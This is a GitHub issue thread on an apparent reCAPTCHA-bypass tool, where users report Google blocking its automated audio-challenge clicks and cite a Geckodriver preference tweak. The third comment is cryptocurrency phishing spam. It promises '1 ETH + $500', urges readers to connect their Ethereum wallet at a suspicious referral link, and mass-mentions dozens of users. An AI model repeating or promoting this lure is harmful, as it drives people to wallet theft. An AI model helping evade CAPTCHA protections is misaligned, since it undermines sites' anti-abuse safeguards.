### ISSUE TITLE
Your computer or network may be sending automated queries

### ISSUE THREAD

**Issue by SelmiAbderrahim** [teal33t/captcha_bypass#3]
I think it doesn't work anymore. I got this error when it clicks on audio button:

> Your computer or network may be sending automated queries. To protect our users, we can't process your request right now. For more details visit our help page

I think it's hard to disable Strict Origin Policy on Geckodriver.
`profile.set_preference("security.fileuri.strict_origin_policy", False)`

**Comment by Maulorian** [comment]
I get Message: Dismissed user prompt dialog: Cannot contact reCAPTCHA. Check your connection and try again.

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
aadfPT, @itsantonis, @sdboyer, @emg110, @siragi, @jarihte, @31526, @Zequez, @Pana, @NedJunk, @matthiss, @flowersinthesand, @khaot0m, @and00999, @zimme, @EthanInMel, @bakerkretzmar, @discountry, @MilleniumSpark, @brycemcwilliams, @ghabs, @lazaruslarue, @notwithstandingtheforegoing, @FashionCloudInc, @Swizz, @kr1sp1n, @Actulance, @mitchellfox, @julioAk47, @miguelsalazar, @hamiltonle, @brybalicious, @nafem, @dakna, @IgorFrolov, @brianru, @HossamEldinAtef, @RyanHendricks, @brtn, @silverton, @rul, @mehdim, @robgering, @andrewtlove, @josescasanova, @kirushik, @dokenzy, @worosom, @denisnazarov, @shlavik
